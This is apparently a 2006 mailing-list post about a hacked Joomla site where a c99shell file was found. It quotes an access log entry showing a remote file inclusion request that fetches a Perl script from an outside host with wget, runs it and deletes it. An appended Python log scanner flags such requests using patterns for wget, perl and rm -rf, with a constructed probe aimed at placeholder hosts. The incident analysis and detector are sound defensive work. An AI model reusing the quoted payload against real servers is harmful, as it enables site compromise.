>Yes, I have a problem, but not one with Joomla. I am using the
>latest version of Joomla. If the issue was with Joomla there
>would be entries in the error_log and access_log that showed
>which exploit was being used.

Okay, try another tack. When we looked at the site on our server that had a
problem, we found a PHP file that should not have been there. Looking at it,
it appears to be c99shell. I haven't found out too much about it, but it's
not good!

In our case I'm sure it got there by Joomla.

Here is what I find in the logs for the same time as the file we found:

julia.combios.es - - [15/Sep/2006:13:07:21 +0100] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kariwuhrer.net/forums/help.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebtown.com/al00rs/v6.txt;p?&cmd=cd%20/tmp/;wget%20http://www.freewebtown.com/al00rs/v6.txt;perl%20v6.txt;rm%20-rf%20v6* HTTP/1.0" 200 11120 "-" "Mozilla/5.0"

I need to analyse the logs more carefully, as this isn't the file that is on
the system, but I think it is the Perl script they were running.

I suspect I will be making some complaints to ISPs shortly!

In your case I'm not sure what you have or how/why it got there, but I would
be looking very carefully for something that shouldn't be there, as it is
rare for a BQ box to go wild like that without someone trying to do
something they shouldn't be.

Gavin
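
Added example, not part of the original message: a small access_log scanner that flags requests shaped like the entry quoted above, where a parameter such as ff_compath carries a remote URL and the query string carries download-and-run commands. The function names, sample hosts and sample lines are constructed for illustration; a legitimate redirect parameter holding a URL would also be flagged and needs manual review.

```python
import re
from urllib.parse import unquote

# host ident user [time] "METHOD target HTTP/x.y" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) ')
# Parameter whose value is a remote URL (the ff_compath=http://... shape).
REMOTE_RE = re.compile(r'(?:^|[?&;])([\w\[\]]+)=(?:https?|ftp)://', re.I)
# Download-and-run tokens in the query (the cmd=cd /tmp/;wget ...;perl ... shape).
SHELL_RE = re.compile(r'\b(?:wget|curl|perl)\s|\brm\s+-rf\b|\bcd\s+/tmp', re.I)

# Constructed sample lines with placeholder hosts, modelled on the entry above.
PROBE = ('/components/com_facileforms/facileforms.frame.php'
         '?ff_compath=http://remote.example.org/help.gif?&cmd=cd%20/tmp/;'
         'wget%20http://remote.example.org/v6.txt;perl%20v6.txt;rm%20-rf%20v6*')
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2006:13:05:02 +0100] '
    '"GET /index.php?option=com_content&task=view&id=5 HTTP/1.0" 200 8342 "-" "Mozilla/5.0"',
    'client.example.net - - [15/Sep/2006:13:07:21 +0100] '
    '"GET ' + PROBE + ' HTTP/1.0" 200 11120 "-" "Mozilla/5.0"',
    'client.example.net - - [15/Sep/2006:13:09:40 +0100] '
    '"GET ' + PROBE + ' HTTP/1.0" 404 291 "-" "Mozilla/5.0"',
]

def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, _method, target, status = m.groups()
    # Decode %20 etc. and look only at the query string, not the path.
    _path, _, query = unquote(target).partition("?")
    reasons = []
    hit = REMOTE_RE.search(query)
    if hit:
        reasons.append("remote URL in parameter " + hit.group(1))
    if SHELL_RE.search(query):
        reasons.append("shell command tokens in query string")
    if not reasons:
        return None
    # A 2xx status means the script was served, so that host needs a closer look.
    return {"client": client, "time": when, "status": int(status),
            "served": status.startswith("2"), "reasons": reasons}

def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Findings with "served" set are the ones to correlate with the modification time of any unexpected file in the web root or /tmp.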